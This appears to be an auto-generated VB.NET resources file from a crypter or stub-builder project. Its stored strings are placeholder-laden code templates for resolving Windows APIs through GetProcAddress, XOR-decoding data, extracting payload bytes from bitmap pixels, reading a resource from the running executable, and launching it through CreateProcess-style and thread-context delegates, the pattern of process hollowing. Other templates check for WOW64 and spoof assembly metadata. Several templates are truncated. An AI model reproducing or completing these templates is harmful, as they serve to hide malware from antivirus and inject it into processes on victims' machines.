'------------------------------------------------------------------------------
' <auto-generated>
'     This code was generated by a tool.
'     Runtime Version:4.0.30319.235
'
'     Changes to this file may cause incorrect behavior and will be lost if
'     the code is regenerated.
' </auto-generated>
'------------------------------------------------------------------------------

Option Strict On
Option Explicit On

Imports System

Namespace My.Resources
    
    'This class was auto-generated by the StronglyTypedResourceBuilder
    'class via a tool like ResGen or Visual Studio.
    'To add or remove a member, edit your .ResX file then rerun ResGen
    'with the /str option, or rebuild your VS project.
    '''<summary>
    '''  A strongly-typed resource class, for looking up localized strings, etc.
    '''</summary>
    <Global.System.CodeDom.Compiler.GeneratedCodeAttribute("System.Resources.Tools.StronglyTypedResourceBuilder", "4.0.0.0"),  _
     Global.System.Diagnostics.DebuggerNonUserCodeAttribute(),  _
     Global.System.Runtime.CompilerServices.CompilerGeneratedAttribute(),  _
     Global.Microsoft.VisualBasic.HideModuleNameAttribute()>  _
    Friend Module Resources
        
        Private resourceMan As Global.System.Resources.ResourceManager
        
        Private resourceCulture As Global.System.Globalization.CultureInfo
        
        '''<summary>
        '''  Returns the cached ResourceManager instance used by this class.
        '''</summary>
        <Global.System.ComponentModel.EditorBrowsableAttribute(Global.System.ComponentModel.EditorBrowsableState.Advanced)>  _
        Friend ReadOnly Property ResourceManager() As Global.System.Resources.ResourceManager
            Get
                If Object.ReferenceEquals(resourceMan, Nothing) Then
                    Dim temp As Global.System.Resources.ResourceManager = New Global.System.Resources.ResourceManager("Client.Resources", GetType(Resources).Assembly)
                    resourceMan = temp
                End If
                Return resourceMan
            End Get
        End Property
        
        '''<summary>
        '''  Overrides the current thread's CurrentUICulture property for all
        '''  resource lookups using this strongly typed resource class.
        '''</summary>
        <Global.System.ComponentModel.EditorBrowsableAttribute(Global.System.ComponentModel.EditorBrowsableState.Advanced)>  _
        Friend Property Culture() As Global.System.Globalization.CultureInfo
            Get
                Return resourceCulture
            End Get
            Set
                resourceCulture = value
            End Set
        End Property
        
        '''<summary>
        '''  Looks up a localized string similar to &lt;DllImport(&quot;kernel32.dll&quot;, EntryPoint:=&quot;!R1&quot;)&gt; _
        '''Function !N1(ByVal ?N2 As String) As IntPtr
        '''End Function
        '''$GB
        '''&lt;DllImport(&quot;kernel32.dll&quot;, EntryPoint:=&quot;GetProcAddress&quot;)&gt; _
        '''Function !N1(ByVal ?N2 As IntPtr, ByVal ?N3 As String) As IntPtr
        '''End Function
        '''$GB
        '''Function !N1(Of ?N2)(!P1) As ?N2
        '''$PV
        '''$PV
        '''Return CType(CType(Marshal.GetDelegateForFunctionPointer(!N1(!N1(?N3.Split(Convert.ToChar(58))(0)), ?N3.Split(Convert.ToChar(58))(1)), GetType(?N2)), Object), ?N2)
        '''End Function
        '''$GB.
        '''</summary>
        Friend ReadOnly Property API() As String
            Get
                Return ResourceManager.GetString("API", resourceCulture)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized string similar to &lt;Assembly: AssemblyTitle(&quot;{1}&quot;)&gt; 
        '''&lt;Assembly: AssemblyDescription(&quot;{2}&quot;)&gt; 
        '''&lt;Assembly: AssemblyCompany(&quot;{3}&quot;)&gt; 
        '''&lt;Assembly: AssemblyProduct(&quot;{4}&quot;)&gt; 
        '''&lt;Assembly: AssemblyCopyright(&quot;{5}&quot;)&gt; 
        '''&lt;Assembly: AssemblyTrademark(&quot;{6}&quot;)&gt;
        '''&lt;Assembly: AssemblyFileVersion(&quot;{7}.{8}.{9}.{10}&quot;)&gt;
        '''&lt;Assembly: AssemblyVersion(&quot;{7}.{8}.{9}.{10}&quot;)&gt;.
        '''</summary>
        Friend ReadOnly Property AssemblyEditor() As String
            Get
                Return ResourceManager.GetString("AssemblyEditor", resourceCulture)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized string similar to Private ?N9 As Byte() = New Byte() {0, 0, 10, 12, 13, 15, 34, 127, 133}
        '''$GB
        '''Function !N1(!P1) As Byte()
        '''$PV
        '''Dim ?N2(8) As Byte, ?N3 As New Dictionary(Of Char, Byte)(255)
        '''Dim ?N4 As New MemoryStream(?N1.Length), ?N5 As Byte, ?N6 As Boolean, ?N7 As Integer
        '''For ?N8 As Integer = 0 To 255
        '''?N3.Add(Convert.ToChar(?N8), CByte(?N8))
        '''Next
        '''?N9(0) = ?N3(?N1(0))
        '''For ?N8 As Byte = 1 To 9
        '''?N2(?N8 - 1) = ?N3(?N1(?N8))
        '''Next
        '''For ?N8 As Integer = 10 To ?N1.Length - 1
        '''?N5 = ?N3(?N1(?N8))
        '''If ?N5 = ?N9(0) Then
        '''?N [rest of string was truncated]&quot;;.
        '''</summary>
        Friend ReadOnly Property Decode() As String
            Get
                Return ResourceManager.GetString("Decode", resourceCulture)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized string similar to Function !N1(!P1) As Byte()
        '''$PV
        '''Dim ?N2 As Drawing.Color = Drawing.Color.FromArgb(?N1)
        '''$PV
        '''Return New Byte() {?N2.B, ?N2.G, ?N2.R, ?N2.A}
        '''End Function
        '''$GB.
        '''</summary>
        Friend ReadOnly Property GetBytes() As String
            Get
                Return ResourceManager.GetString("GetBytes", resourceCulture)
            End Get
        End Property
        
        Friend ReadOnly Property header() As System.Drawing.Bitmap
            Get
                Dim obj As Object = ResourceManager.GetObject("header", resourceCulture)
                Return CType(obj,System.Drawing.Bitmap)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized string similar to Delegate Function ?N5 (ByVal !N1 As String) As IntPtr
        '''$GB
        '''Delegate Function ?N6 (ByVal !N1 As IntPtr, ByVal ?N1 As String, ByVal ?N2 As String) As IntPtr
        '''$GB
        '''Delegate Function ?N7 (ByVal !N1 As IntPtr, ByVal ?N1 As IntPtr) As Integer
        '''$GB
        '''Delegate Function ?N8 (ByVal !N1 As IntPtr, ByVal ?N1 As IntPtr) As IntPtr
        '''$GB
        '''Function !N1(!P1) As Byte()
        '''$PV
        '''Dim ?N2 As IntPtr = !D1(Assembly.GetEntryAssembly.Location)
        '''Dim ?N3 As IntPtr = !D2(?N2, ?N1, !S1)
        '''Dim ?N4(!D3(?N2, ?N3) - 1) As Byte
        '''Marshal.Copy(!D4 [rest of string was truncated]&quot;;.
        '''</summary>
        Friend ReadOnly Property Native() As String
            Get
                Return ResourceManager.GetString("Native", resourceCulture)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized string similar to Function !N1(!P1) As Byte()
        '''$PV
        '''Dim ?N2 As New MemoryStream, ?N3 As Byte()
        '''For Each ?N4 As Object In ?N1
        '''If TypeOf ?N4 Is Byte() Then
        '''?N3 = DirectCast(?N4, Byte())
        '''?N2.Write(?N3, 0, ?N3.Length)
        '''Else
        '''For Each ?N5 As ULong In DirectCast(?N4, ULong())
        '''?N3 = BitConverter.GetBytes(?N5)
        '''?N2.Write(?N3, 0, ?N3.Length)
        '''Next
        '''End If
        '''Next
        '''!N1 = ?N2.ToArray
        '''?N2.Close()
        '''$PV
        '''End Function
        '''$GB.
        '''</summary>
        Friend ReadOnly Property Numeric() As String
            Get
                Return ResourceManager.GetString("Numeric", resourceCulture)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized string similar to Delegate Function ?N21(ByVal !N1 As String, ByVal ?N2 As String, ByVal ?N3 As IntPtr, ByVal ?N4 As IntPtr, ByVal ?N5 As Boolean, ByVal ?N6 As Integer, ByVal ?N7 As IntPtr, ByVal ?N8 As String, ByVal ?N9 As Byte(), ByVal ?N10 As IntPtr()) As Boolean
        '''$GB
        '''Delegate Function ?N22(ByVal !N1 As IntPtr, ByVal ?N2 As UInteger()) As Boolean
        '''$GB
        '''Delegate Function ?N23(ByVal !N1 As IntPtr, ByVal ?N2 As IntPtr, ByRef ?N3 As IntPtr, ByVal ?N4 As IntPtr, ByRef ?N5 As IntPtr) As Boolean
        '''$GB
        '''Delegate Function ?N24(ByV [rest of string was truncated]&quot;;.
        '''</summary>
        Friend ReadOnly Property Run() As String
            Get
                Return ResourceManager.GetString("Run", resourceCulture)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized string similar to Function !N1(!P1) As String
        '''$PV
        '''$PV
        '''Return Encoding.UTF8.GetString(!R1)
        '''End Function
        '''$GB.
        '''</summary>
        Friend ReadOnly Property String_() As String
            Get
                Return ResourceManager.GetString("String_", resourceCulture)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized string similar to Sokrat ti u gacama.
        '''</summary>
        Friend ReadOnly Property String1() As String
            Get
                Return ResourceManager.GetString("String1", resourceCulture)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized string similar to Function !N1(!P1) As Integer
        '''$PV
        '''$PV
        '''Return Drawing.Color.FromArgb(?N1(?N2 + 3), ?N1(?N2 + 2), ?N1(?N2 + 1), ?N1(?N2)).ToArgb
        '''End Function
        '''$GB.
        '''</summary>
        Friend ReadOnly Property ToInt32() As String
            Get
                Return ResourceManager.GetString("ToInt32", resourceCulture)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized string similar to Delegate Function ?N3(ByVal handle As IntPtr, ByRef result As Boolean) As Boolean
        '''Function !N1(!P1) As Boolean
        '''If IntPtr.Size = 8 Then Return True
        '''Dim ?N1 As Version = Environment.OSVersion.Version
        '''If ?N1.Major = 5 And ?N1.Minor &gt; 0 Or ?N1.Major &gt; 5 Then
        '''Dim ?N2 As Boolean
        '''If Not !D1(Process.GetCurrentProcess.Handle, ?N2) Then Return False
        '''Return ?N2
        '''End If
        '''Return False
        '''End Function.
        '''</summary>
        Friend ReadOnly Property Wow64() As String
            Get
                Return ResourceManager.GetString("Wow64", resourceCulture)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized string similar to Function !N1(!P1) As Byte()
        '''$PV
        '''Dim ?N2 As Byte() = !R1
        '''Dim ?N3 As Integer = ?N2.Length
        '''For ?N4 As Integer = 0 To ?N1.Length - 1
        '''?N1(?N4) = ?N1(?N4) Xor ?N2(?N4 Mod ?N3)
        '''Next
        '''$PV
        '''Return ?N1
        '''End Function
        '''$GB.
        '''</summary>
        Friend ReadOnly Property XOR_() As String
            Get
                Return ResourceManager.GetString("XOR_", resourceCulture)
            End Get
        End Property
    End Module
End Namespace
